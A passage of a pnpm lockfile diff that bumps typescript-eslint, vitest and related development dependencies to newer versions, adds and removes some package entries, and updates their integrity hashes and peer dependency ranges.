     resolution: {integrity: sha512-Mw558oeA9fFbv65/y4mHtXDs9bPnFMZAL/jxdPFUpOHHIXX91mcgEHbS5Lahr+pwZFR8A7GQleRWeI6cGFC2UA==}
@@ -1136,6 +897,9 @@ packages:
 
   '@types/estree@1.0.8':
     resolution: {integrity: sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==}
+
+  '@types/estree@1.0.9':
+    resolution: {integrity: sha512-GhdPgy1el4/ImP05X05Uw4cw2/M93BCUmnEvWZNStlCzEKME4Fkk+YpoA5OiHNQmoS7Cafb8Xa3Pya8m1Qrzeg==}
 
   '@types/json-schema@7.0.15':
     resolution: {integrity: sha512-5+fP8P8MFNC+AyZCDxrB2pkZFPGzqQWUzpSeuuVLvm8VMcorNYavBqoFcxK8bQz4Qsbn4oUEEem4wDLfcysGHA==}
@@ -1164,127 +928,102 @@ packages:
   '@types/update-notifier@6.0.8':
     resolution: {integrity: sha512-IlDFnfSVfYQD+cKIg63DEXn3RFmd7W1iYtKQsJodcHK9R1yr8aKbKaPKfBxzPpcHCq2DU8zUq4PIPmy19Thjfg==}
 
-  '@typescript-eslint/eslint-plugin@8.46.2':
-    resolution: {integrity: sha512-ZGBMToy857/NIPaaCucIUQgqueOiq7HeAKkhlvqVV4lm089zUFW6ikRySx2v+cAhKeUCPuWVHeimyk6Dw1iY3w==}
+  '@typescript-eslint/eslint-plugin@8.65.0':
+    resolution: {integrity: sha512-IEgob78X12rHpUmtcwFsXhZdVGJtwTVP8FiCLZkR6GlYVrl2PcuB+KhCE5BlVC/eQpQnu8WXRtkHZuPar+gCRA==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     peerDependencies:
-      '@typescript-eslint/parser': ^8.46.2
-      eslint: ^8.57.0 || ^9.0.0
-      typescript: '>=4.8.4 <6.0.0'
+      '@typescript-eslint/parser': ^8.65.0
+      eslint: ^8.57.0 || ^9.0.0 || ^10.0.0
+      typescript: '>=4.8.4 <6.1.0'
 
-  '@typescript-eslint/parser@8.46.2':
-    resolution: {integrity: sha512-BnOroVl1SgrPLywqxyqdJ4l3S2MsKVLDVxZvjI1Eoe8ev2r3kGDo+PcMihNmDE+6/KjkTubSJnmqGZZjQSBq/g==}
+  '@typescript-eslint/parser@8.65.0':
+    resolution: {integrity: sha512-CZ4nMxWwgu1HEEFNkeaCptra9QCtkmKdgf3sWh1rl1trIhmxLilgTV4cwcbQ4wemnT4sWQN8CaKOmdYx+g2gMA==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     peerDependencies:
-      eslint: ^8.57.0 || ^9.0.0
-      typescript: '>=4.8.4 <6.0.0'
+      eslint: ^8.57.0 || ^9.0.0 || ^10.0.0
+      typescript: '>=4.8.4 <6.1.0'
 
-  '@typescript-eslint/project-service@8.46.2':
-    resolution: {integrity: sha512-PULOLZ9iqwI7hXcmL4fVfIsBi6AN9YxRc0frbvmg8f+4hQAjQ5GYNKK0DIArNo+rOKmR/iBYwkpBmnIwin4wBg==}
+  '@typescript-eslint/project-service@8.65.0':
+    resolution: {integrity: sha512-SxnPhbTsGahizDgbu7oqFH/xVtzIqMd/s+WtnSxNxJZJpLbdT5IPdzg8EZxO3+PoKahXmwJLeNQOpKJb3/bi7Q==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     peerDependencies:
-      typescript: '>=4.8.4 <6.0.0'
+      typescript: '>=4.8.4 <6.1.0'
 
-  '@typescript-eslint/scope-manager@8.23.0':
-    resolution: {integrity: sha512-OGqo7+dXHqI7Hfm+WqkZjKjsiRtFUQHPdGMXzk5mYXhJUedO7e/Y7i8AK3MyLMgZR93TX4bIzYrfyVjLC+0VSw==}
+  '@typescript-eslint/scope-manager@8.65.0':
+    resolution: {integrity: sha512-Esbl8OSYiVxBokYgWPf7VVWg/BE798wXhimnn9ML9Pt5qoDf8bfQlgjlKXR/k98+AcNzlLKYrpCcrcuZ9DZLgg==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
 
-  '@typescript-eslint/scope-manager@8.46.2':
-    resolution: {integrity: sha512-LF4b/NmGvdWEHD2H4MsHD8ny6JpiVNDzrSZr3CsckEgCbAGZbYM4Cqxvi9L+WqDMT+51Ozy7lt2M+d0JLEuBqA==}
-    engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
-
-  '@typescript-eslint/tsconfig-utils@8.46.2':
-    resolution: {integrity: sha512-a7QH6fw4S57+F5y2FIxxSDyi5M4UfGF+Jl1bCGd7+L4KsaUY80GsiF/t0UoRFDHAguKlBaACWJRmdrc6Xfkkag==}
+  '@typescript-eslint/tsconfig-utils@8.65.0':
+    resolution: {integrity: sha512-j6GzGqCiRdA7Qhur2VVmKZAkBLfnHFQfx4TaJGL9RMveZqCo48jSHHO0DTgizEnGhtWnqmbtCUSrqSkdiY/0Hg==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     peerDependencies:
-      typescript: '>=4.8.4 <6.0.0'
+      typescript: '>=4.8.4 <6.1.0'
 
-  '@typescript-eslint/type-utils@8.46.2':
-    resolution: {integrity: sha512-HbPM4LbaAAt/DjxXaG9yiS9brOOz6fabal4uvUmaUYe6l3K1phQDMQKBRUrr06BQkxkvIZVVHttqiybM9nJsLA==}
+  '@typescript-eslint/type-utils@8.65.0':
+    resolution: {integrity: sha512-YjaZ7PRI5qY7ax2L3PbvX0rRyGtipAReCWs0mhhDBHjH/vl0g0BonaGXrKdKpMbIIsMIwDgbk/xzkBTyAltS5g==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     peerDependencies:
-      eslint: ^8.57.0 || ^9.0.0
-      typescript: '>=4.8.4 <6.0.0'
+      eslint: ^8.57.0 || ^9.0.0 || ^10.0.0
+      typescript: '>=4.8.4 <6.1.0'
 
-  '@typescript-eslint/types@8.23.0':
-    resolution: {integrity: sha512-1sK4ILJbCmZOTt9k4vkoulT6/y5CHJ1qUYxqpF1K/DBAd8+ZUL4LlSCxOssuH5m4rUaaN0uS0HlVPvd45zjduQ==}
+  '@typescript-eslint/types@8.65.0':
+    resolution: {integrity: sha512-JSSwWNy+H0E/01jJEM+hrX6N0OFDzFzeIhHFSAS01tlVaevpG8cFyYRPhS5yjGOvBUx3sqQHVMjCL1CAZZMxBg==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
 
-  '@typescript-eslint/types@8.46.2':
-    resolution: {integrity: sha512-lNCWCbq7rpg7qDsQrd3D6NyWYu+gkTENkG5IKYhUIcxSb59SQC/hEQ+MrG4sTgBVghTonNWq42bA/d4yYumldQ==}
-    engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
-
-  '@typescript-eslint/typescript-estree@8.23.0':
-    resolution: {integrity: sha512-LcqzfipsB8RTvH8FX24W4UUFk1bl+0yTOf9ZA08XngFwMg4Kj8A+9hwz8Cr/ZS4KwHrmo9PJiLZkOt49vPnuvQ==}
+  '@typescript-eslint/typescript-estree@8.65.0':
+    resolution: {integrity: sha512-JboAE2swaYt4tb1fHhHTABE2K+OLy09XfcTbhnk4Pw96f9dd2e9iYsJ28gBggHlo5z5x1rkyWvcPoTuNTd4oGg==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     peerDependencies:
-      typescript: '>=4.8.4 <5.8.0'
+      typescript: '>=4.8.4 <6.1.0'
 
-  '@typescript-eslint/typescript-estree@8.46.2':
-    resolution: {integrity: sha512-f7rW7LJ2b7Uh2EiQ+7sza6RDZnajbNbemn54Ob6fRwQbgcIn+GWfyuHDHRYgRoZu1P4AayVScrRW+YfbTvPQoQ==}
+  '@typescript-eslint/utils@8.65.0':
+    resolution: {integrity: sha512-gXiwIHsYreboxeJucHKPvgwl7dXt50mF8s1/c00cP/WoVTyWKFdtfhRWwZiXYFU5H2O8vVoSLNrexFZjYS/SGA==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     peerDependencies:
-      typescript: '>=4.8.4 <6.0.0'
+      eslint: ^8.57.0 || ^9.0.0 || ^10.0.0
+      typescript: '>=4.8.4 <6.1.0'
 
-  '@typescript-eslint/utils@8.23.0':
-    resolution: {integrity: sha512-uB/+PSo6Exu02b5ZEiVtmY6RVYO7YU5xqgzTIVZwTHvvK3HsL8tZZHFaTLFtRG3CsV4A5mhOv+NZx5BlhXPyIA==}
+  '@typescript-eslint/visitor-keys@8.65.0':
+    resolution: {integrity: sha512-8C71BQkGjiMmXtop7pHVJu1l2NNShFdkCyD6a2ezzs5vU/L3LRtb69EtcteFwz0mYMPzIgOw0n6OV4VBUWZd7A==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
+
+  '@vitest/coverage-v8@4.1.10':
+    resolution: {integrity: sha512-IM49HmthevbgAO4anp1hwtoT9wYe59w0LR00gr+eagHE+ZJ5lK4sLPeO0ubgoJcwLk6dehU3R24N+FbEEKDc8g==}
     peerDependencies:
-      eslint: ^8.57.0 || ^9.0.0
-      typescript: '>=4.8.4 <5.8.0'
-
-  '@typescript-eslint/utils@8.46.2':
-    resolution: {integrity: sha512-sExxzucx0Tud5tE0XqR0lT0psBQvEpnpiul9XbGUB1QwpWJJAps1O/Z7hJxLGiZLBKMCutjTzDgmd1muEhBnVg==}
-    engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
-    peerDependencies:
-      eslint: ^8.57.0 || ^9.0.0
-      typescript: '>=4.8.4 <6.0.0'
-
-  '@typescript-eslint/visitor-keys@8.23.0':
-    resolution: {integrity: sha512-oWWhcWDLwDfu++BGTZcmXWqpwtkwb5o7fxUIGksMQQDSdPW9prsSnfIOZMlsj4vBOSrcnjIUZMiIjODgGosFhQ==}
-    engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
-
-  '@typescript-eslint/visitor-keys@8.46.2':
-    resolution: {integrity: sha512-tUFMXI4gxzzMXt4xpGJEsBsTox0XbNQ1y94EwlD/CuZwFcQP79xfQqMhau9HsRc/J0cAPA/HZt1dZPtGn9V/7w==}
-    engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
-
-  '@vitest/coverage-v8@3.2.4':
-    resolution: {integrity: sha512-EyF9SXU6kS5Ku/U82E259WSnvg6c8KTjppUncuNdm5QHpe17mwREHnjDzozC8x9MZ0xfBUFSaLkRv4TMA75ALQ==}
-    peerDependencies:
-      '@vitest/browser': 3.2.4
-      vitest: 3.2.4
+      '@vitest/browser': 4.1.10
+      vitest: 4.1.10
     peerDependenciesMeta:
       '@vitest/browser':
         optional: true
 
-  '@vitest/expect@3.2.4':
-    resolution: {integrity: sha512-Io0yyORnB6sikFlt8QW5K7slY4OjqNX9jmJQ02QDda8lyM6B5oNgVWoSoKPac8/kgnCUzuHQKrSLtu/uOqqrig==}
+  '@vitest/expect@4.1.10':
+    resolution: {integrity: sha512-YsCn+qAk1GWjQOWFEsEcL2gNQ0zmVmQu3T03qP6UyjhtmdtwtbuI+DASn/7iQB3HGTXkdBwGddzxPlmiql5vlA==}
 
-  '@vitest/mocker@3.2.4':
-    resolution: {integrity: sha512-46ryTE9RZO/rfDd7pEqFl7etuyzekzEhUbTW3BvmeO/BcCMEgq59BKhek3dXDWgAj4oMK6OZi+vRr1wPW6qjEQ==}
+  '@vitest/mocker@4.1.10':
+    resolution: {integrity: sha512-v0xaezt+DKEmKfaxg133ldzADrwLGd7Ze1MfQQTYfvs8OqZIwbxyxaYURivwV7sWy5fqn3rH5uOrSp07bp44Ow==}
     peerDependencies:
       msw: ^2.4.9
-      vite: ^5.0.0 || ^6.0.0 || ^7.0.0-0
+      vite: ^6.0.0 || ^7.0.0 || ^8.0.0
     peerDependenciesMeta:
       msw:
         optional: true
       vite:
         optional: true
 
-  '@vitest/pretty-format@3.2.4':
-    resolution: {integrity: sha512-IVNZik8IVRJRTr9fxlitMKeJeXFFFN0JaB9PHPGQ8NKQbGpfjlTx9zO4RefN8gp7eqjNy8nyK3NZmBzOPeIxtA==}
+  '@vitest/pretty-format@4.1.10':
+    resolution: {integrity: sha512-W1HsjSH4MXQ9YfmmhLAoIYf1HRfekQCGngeIgcei6MP5QQGWUe0gkopdZQaVCFO+JDJMrAJGwa5pRpNpvy4P8Q==}
 
-  '@vitest/runner@3.2.4':
-    resolution: {integrity: sha512-oukfKT9Mk41LreEW09vt45f8wx7DordoWUZMYdY/cyAk7w5TWkTRCNZYF7sX7n2wB7jyGAl74OxgwhPgKaqDMQ==}
+  '@vitest/runner@4.1.10':
+    resolution: {integrity: sha512-IKI6kpIH+LmpROplyLwBBaCfMgOZOMsygVa6BARD6ahA04VRuJSa6OaVG7kRvSEMD870Vd91rSSw0eegtWyLGg==}
 
-  '@vitest/snapshot@3.2.4':
-    resolution: {integrity: sha512-dEYtS7qQP2CjU27QBC5oUOxLE/v5eLkGqPE0ZKEIDGMs4vKWe7IjgLOeauHsR0D5YuuycGRO5oSRXnwnmA78fQ==}
+  '@vitest/snapshot@4.1.10':
+    resolution: {integrity: sha512-xRkfOT1qpTAi/Ti4Y1LtfRc3kEuqxGw59eN2jN9pRWMtS/XDevekhcFSqvQqjUNGksfjMJu3Y+oJ+4Ypn2OaJw==}
 
-  '@vitest/spy@3.2.4':
-    resolution: {integrity: sha512-vAfasCOe6AIK70iP5UD11Ac4siNUNJ9i/9PZ3NKx07sG6sUxeag1LWdNrMWeKKYBLlzuK+Gn65Yd5nyL6ds+nw==}
+  '@vitest/spy@4.1.10':
+    resolution: {integrity: sha512-PLf/Ugvoq5wO/b4rwYCR1h2PSIdXz7wnkQFMiUpLdtM7l6pqVFcQIBEHyT1+l+cj7mNwAfZHzqXqDyjvOuwbDw==}
 
-  '@vitest/utils@3.2.4':
-    resolution: {integrity: sha512-fB2V0JFrQSMsCo9HiSq3Ezpdv4iYaXRG1Sx8edX3MwxfyNn83mKiGzOcH+Fkxt4MHxr3y42fQi1oeAInqgX2QA==}
+  '@vitest/utils@4.1.10':
+    resolution: {integrity: sha512-fy9am/HWxbaGt/Sawrp90vt6Y6jQwf1RX77cz3uwoJwJVMli/e1IEwRPnMNJ7vKfPTwo0diXifkpPvwH9v7nGA==}
 
   acorn-jsx@5.3.2:
     resolution: {integrity: sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==}
@@ -1301,8 +1040,13 @@ packages:
     engines: {node: '>=0.4.0'}
     hasBin: true
 
-  ajv@6.12.6:
-    resolution: {integrity: sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==}
+  acorn@8.17.0:
+    resolution: {integrity: sha512-xRQbDb9BnwDafYNn6Vwl839DYVjqXYb1XVGtWAZ1kcDc6iwAL4hg3B1dZlRiuENFeO2H53gFG3in621AdERVAg==}
+    engines: {node: '>=0.4.0'}
+    hasBin: true
+
+  ajv@6.15.0:
+    resolution: {integrity: sha512-fgFx7Hfoq60ytK2c7DhnF8jIvzYgOMxfugjLOSMHjLIPgenqa7S7oaagATUq99mV6IYvN2tRmC0wnTYX6iPbMw==}
 
   ansi-align@3.0.1:
     resolution: {integrity: sha512-IOfwwBF5iczOjp/WeY4YxyjqAFMQoZufdQWDd19SEExbVLNXqvpzSJ/M7Za4/sCPmQ0+GRquoA7bGcINcxew6w==}
@@ -1341,14 +1085,14 @@ packages:
     resolution: {integrity: sha512-Izi8RQcffqCeNVgFigKli1ssklIbpHnCYc6AknXGYoB6grJqyeby7jv12JUQgmTAnIDnbck1uxksT4dzN3PWBA==}
     engines: {node: '>=12'}
 
-  ast-v8-to-istanbul@0.3.7:
-    resolution: {integrity: sha512-kr1Hy6YRZBkGQSb6puP+D6FQ59Cx4m0siYhAxygMCAgadiWQ6oxAxQXHOMvJx67SJ63jRoVIIg5eXzUbbct1ww==}
+  ast-v8-to-istanbul@1.0.5:
+    resolution: {integrity: sha512-UPAgKJFSEGMWSDr3LX4tqnAb4f7KGT8O40Tyx8wbYmmZ/yn58lNCm8h3svs3eXgiGd5AXxz8NDOvXWvicq+rJA==}
 
   atomically@2.0.3:
     resolution: {integrity: sha512-kU6FmrwZ3Lx7/7y3hPS5QnbJfaohcIul5fGqf7ok+4KklIEk9tJ0C2IQPdacSbVUWv6zVHXEBWoWd6NrVMT7Cw==}
 
-  automd@0.4.2:
-    resolution: {integrity: sha512-9Gey0OG4gu2IzoLbwRj2fqyntJPbEFox/5KdOgg0zflkzq5lyOapWE324xYOvVdk9hgyjiMvDcT6XUPAIJhmag==}
+  automd@0.4.3:
+    resolution: {integrity: sha512-5WJNEiaNpFm8h0OmQzhnESthadUQhJwQfka/TmmJpMudZ8qU9MZao9p0G1g7WYA9pVTz6FMMOSvxnfQ9g8q9vQ==}
     hasBin: true
 
   autoprefixer@10.4.21:
@@ -1361,12 +1105,13 @@ packages:
   balanced-match@1.0.2:
     resolution: {integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==}
 
+  balanced-match@4.0.4:
+    resolution: {integrity: sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==}
+    engines: {node: 18 || 20 || >=22}
+
   baseline-browser-mapping@2.8.19:
     resolution: {integrity: sha512-zoKGUdu6vb2jd3YOq0nnhEDQVbPcHhco3UImJrv5dSkvxTc2pl2WjOPsjZXDwPDSl5eghIMuY3R6J9NDKF3KcQ==}
     hasBin: true
-
-  before-after-hook@2.2.3:
-    resolution: {integrity: sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==}
 
   better-path-resolve@1.0.0:
     resolution: {integrity: sha512-pbnl5XzGBdrFU/wT4jqmJVPn2B6UHPBOhzMQkY/SPUPB6QtUXtmBHBIwCbXJol93mOpGMnQyP/+BB19q04xj7g==}
@@ -1383,11 +1128,12 @@ packages:
     resolution: {integrity: sha512-F3PH5k5juxom4xktynS7MoFY+NUWH5LC4CnH11YB8NPew+HLpmBLCybSAEyb2F+4pRXhuhWqFesoQd6DAyc2hw==}
     engines: {node: '>=18'}
 
-  brace-expansion@1.1.11:
-    resolution: {integrity: sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==}
+  brace-expansion@1.1.16:
+    resolution: {integrity: sha512-IDw48K2/2kRkg9LdJxurvq3lV3aBgq0REY89duEqFRthjlPdXHKMj7EnQOXVckxzgisinf3nHfrcE2FufFLXMw==}
 
-  brace-expansion@2.0.1:
-    resolution: {integrity: sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==}
+  brace-expansion@5.0.7:
+    resolution: {integrity: sha512-7oFy703dxfY3/NLxC1fh2SUCQ0H9rmAY+5EpDVfXjUTTs+HEwR2nYaqLv+GWcTsumwxPfiz6CzCNkwXwBUwqCA==}
+    engines: {node: 18 || 20 || >=22}
 
   braces@3.0.3:
     resolution: {integrity: sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==}
@@ -1407,20 +1153,13 @@ packages:
     resolution: {integrity: sha512-bkXY9WsVpY7CvMhKSR6pZilZu9Ln5WDrKVBUXf2S443etkmEO4V58heTecXcUIsNsi4Rx8JUO4NfX1IcQl4deg==}
     engines: {node: '>=18.20'}
 
-  c12@3.3.1:
-    resolution: {integrity: sha512-LcWQ01LT9tkoUINHgpIOv3mMs+Abv7oVCrtpMRi1PaapVEpWoMga5WuT7/DqFTu7URP9ftbOmimNw1KNIGh9DQ==}
+  c12@3.3.4:
+    resolution: {integrity: sha512-cM0ApFQSBXuourJejzwv/AuPRvAxordTyParRVcHjjtXirtkzM0uK2L9TTn9s0cXZbG7E55jCivRQzoxYmRAlA==}
     peerDependencies:
-      magicast: ^0.3.5
+      magicast: '*'
     peerDependenciesMeta:
       magicast:
         optional: true
-
-  cac@6.7.14:
-    resolution: {integrity: sha512-b6Ilus+c3RrdDk+JhLKUAQfzzgLEPy6wcXqS7f/xe1EETvsDP6GORG7SFuOs6cID5YkqchW/LXZbX5bc8j7ZcQ==}
-    engines: {node: '>=8'}
-
-  call-me-maybe@1.0.2:
-    resolution: {integrity: sha512-HpX65o1Hnr9HH25ojC1YGs7HCQLq0GCOibSaWER0eNpgJ/Z1MZv2mTc7+xh6WOPxbRVcmgbv4hGU+uSQ/2xFZQ==}
 
   callsites@3.1.0:
     resolution: {integrity: sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==}
@@ -1443,8 +1182,8 @@ packages:
   caniuse-lite@1.0.30001751:
     resolution: {integrity: sha512-A0QJhug0Ly64Ii3eIqHu5X51ebln3k4yTUkY1j8drqpWHVreg/VLijN48cZ1bYPiqOQuqpkIKnzr/Ul8V+p6Cw==}
 
-  chai@5.3.3:
-    resolution: {integrity: sha512-4zNhdJD/iOjSH0A05ea+Ke6MU5mmpQcbQsSOkgdaUMJ9zTlDTD/GYlwohmIE2u0gaxHYiVHEn1Fw9mZ/ktJWgw==}
+  chai@6.2.2:
+    resolution: {integrity: sha512-NUPRluOfOiTKBKvWPtSD4PhFvWCqOi0BGStNWs57X9js7XGTprSmFoz5F0tWhR4WPjNeR9jXqdC7/UpSJTnlRg==}
     engines: {node: '>=18'}
 
   chalk@4.1.2:
@@ -1467,17 +1206,9 @@ packages:
   chardet@2.1.0:
     resolution: {integrity: sha512-bNFETTG/pM5ryzQ9Ad0lJOTa6HWD/YsScAR3EnCPZRPlQh77JocYktSHOUHelyhm8IARL+o4c4F1bP5KVOjiRA==}
 
-  check-error@2.1.1:
-    resolution: {integrity: sha512-OAlb+T7V4Op9OwdkjmguYRqncdlx5JiofwOAUkmTF+jNdHwzTaTs4sRAGpzLF3oOz5xAyDGrPgeIDFQmDOTiJw==}
-    engines: {node: '>= 16'}
-
-  chokidar@4.0.3:
-    resolution: {integrity: sha512-Qgzu8kfBvo+cA4962jnP1KkS6Dop5NS6g7R5LFYJr4b8Ub94PPQXUksCw9PvXoeXPRRddRNC5C1JQUR2SMGtnA==}
-    engines: {node: '>= 14.16.0'}
-
-  ci-info@3.9.0:
-    resolution: {integrity: sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==}
-    engines: {node: '>=8'}
+  chokidar@5.0.0:
+    resolution: {integrity: sha512-TQMmc3w+5AxjpL8iIiwebF73dRDF4fBIieAqGn9RGCWaEVwQ6Fb2cGe31Yns0RRIzii5goJ1Y7xbMwo1TxMplw==}
+    engines: {node: '>= 20.19.0'}
 
   ci-info@4.3.1:
     resolution: {integrity: sha512-Wdy2Igu8OcBpI2pZePZ5oWjPC38tmDVx5WKUXKwlLYkA0ozo85sLsLvkBbBn/sZaSCMFOGZJ14fvW9t5/d7kdA==}
@@ -1485,6 +1216,9 @@ packages:
 
   citty@0.1.6:
     resolution: {integrity: sha512-tskPPKEs8D2KPafUypv2gxwJP8h/OaJmC82QQGGDQcHvXX43xF2VDACcJVmZ0EuSxkpO9Kc4MlrA3q0+FG58AQ==}
+
+  citty@0.2.2:
+    resolution: {integrity: sha512-+6vJA3L98yv+IdfKGZHBNiGW5KHn22e/JwID0Strsz8h4S/csAu/OuICwxrg44k5MRiZHWIo8XXuJgQTriRP4w==}
 
   clean-regexp@1.0.0:
     resolution: {integrity: sha512-GfisEZEJvzKrmGWkvfhgzcz/BllN1USeqD2V6tg14OAOgaCD2Z/PUEuxnAZ/nPvmaHRG7a8y77p1T/IRQ4D1Hw==}
@@ -1524,6 +1258,9 @@ packages:
   confbox@0.2.2:
     resolution: {integrity: sha512-1NB+BKqhtNipMsov4xI/NnhCKp9XG9NamYp5PVm9klAT0fsrNPjaFICsCFhNhwZJKNh7zB/3q8qXz0E9oaMNtQ==}
 
+  confbox@0.2.4:
+    resolution: {integrity: sha512-ysOGlgTFbN2/Y6Cg3Iye8YKulHw+R2fNXHrgSmXISQdMnomY6eNDprVdW9R5xBguEqI954+S6709UyiO7B+6OQ==}
+
   config-chain@1.1.13:
     resolution: {integrity: sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==}
 
@@ -1538,6 +1275,9 @@ packages:
   consola@3.4.2:
     resolution: {integrity: sha512-5IKcdX0nnYavi6G7TtOhwkYzyjfJlatbjMjuLSfE2kYT5pMDOilZ4OvMhi637CcDICTmz3wARPoyhqyX1Y+XvA==}
     engines: {node: ^14.18.0 || >=16.10.0}
+
+  convert-source-map@2.0.0:
+    resolution: {integrity: sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==}
 
   core-js-compat@3.46.0:
     resolution: {integrity: sha512-p9hObIIEENxSV8xIu+V68JjSeARg6UVMG5mR+JEUguG3sI6MsiS1njz2jHmyJDvA+8jX/sytkBHup6kxhM9law==}
@@ -1597,15 +1337,6 @@ packages:
   dataloader@1.4.0:
     resolution: {integrity: sha512-68s5jYdlvasItOJnCuI2Q9s4q98g0pCyL3HrcKJu8KNugUl8ahgmZYg38ysLTgQjjXX3H8CJLkAvWrclWfcalw==}
 
-  debug@4.4.0:
-    resolution: {integrity: sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==}
-    engines: {node: '>=6.0'}
-    peerDependencies:
-      supports-color: '*'
-    peerDependenciesMeta:
-      supports-color:
-        optional: true
-
   debug@4.4.3:
     resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==}
     engines: {node: '>=6.0'}
@@ -1614,14 +1345,6 @@ packages:
     peerDependenciesMeta:
       supports-color:
         optional: true
-
-  decode-uri-component@0.4.1:
-    resolution: {integrity: sha512-+8VxcR21HhTy8nOt6jf20w0c9CADrw1O8d+VZ/YzzCt4bJ3uBjw+D1q2osAB8RnpwwaeYBxy0HyKQxD5JBMuuQ==}
-    engines: {node: '>=14.16'}
-
-  deep-eql@5.0.2:
-    resolution: {integrity: sha512-h5k/5U50IJJFpzfL6nO9jaaumfjO/f2NjK/oYB2Djzm4p9L+3T9qWpZqZ2hAbLPuuYq9wrU08WQyBTL5GbPk5Q==}
-    engines: {node: '>=6'}
 
   deep-extend@0.6.0:
     resolution: {integrity: sha512-LOHxIOaPYdHlJRtCQfDIVZtfw/ufM8+rVj649RIHzcm/vGwQRXFt6OPqIFWsm2XEMrNIEtWR64sY1LEKD2vAOA==}
@@ -1634,11 +1357,8 @@ packages:
     resolution: {integrity: sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==}
     engines: {node: '>=0.10.0'}
 
-  defu@6.1.4:
-    resolution: {integrity: sha512-mEQCMmwJu317oSz8CwdIOdwf3xMif1ttiM8LTufzc3g6kR+9Pe236twL8j3IYT1F7GfRgGcW6MWxzZjLIkuHIg==}
-
-  deprecation@2.3.1:
-    resolution: {integrity: sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==}
+  defu@6.1.7:
+    resolution: {integrity: sha512-7z22QmUWiQ/2d0KkdYmANbRUVABpZ9SNYyH5vx6PZ+nE5bcC0l7uFvEfHlyld/HcGBFTL536ClDt3DEcSlEJAQ==}
 
   destr@2.0.5:
     resolution: {integrity: sha512-ugFTXCtDZunbzasqBxrK93Ik/DRYsO6S/fedkWEMKqt04xZ4csmnmwGDBAb07QWNaGMAmnTIemsYZCksjATwsA==}
@@ -1647,10 +1367,9 @@ packages:
     resolution: {integrity: sha512-reYkTUJAZb9gUuZ2RvVCNhVHdg62RHnJ7WJl8ftMi4diZ6NWlciOzQN88pUhSELEwflJht4oQDv0F0BMlwaYtA==}
     engines: {node: '>=8'}
 
-  detect-libc@1.0.3:
-    resolution: {integrity: sha512-pGjwhsmsp4kL2RTz08wcOlGN83otlqHeD/Z5T8GXZB+/YcpQ/dgo+lbU8ZsGxV0HIvqqxo9l7mqYwyYMD9bKDg==}
-    engines: {node: '>=0.10'}
-    hasBin: true
+  detect-libc@2.1.2:
+    resolution: {integrity: sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==}
+    engines: {node: '>=8'}
 
   didyoumean2@7.0.4:
     resolution: {integrity: sha512-+yW4SNY7W2DOWe2Jx5H4c2qMTFbLGM6wIyoDPkAPy66X+sD1KfYjBPAIWPVsYqMxelflaMQCloZDudELIPhLqA==}
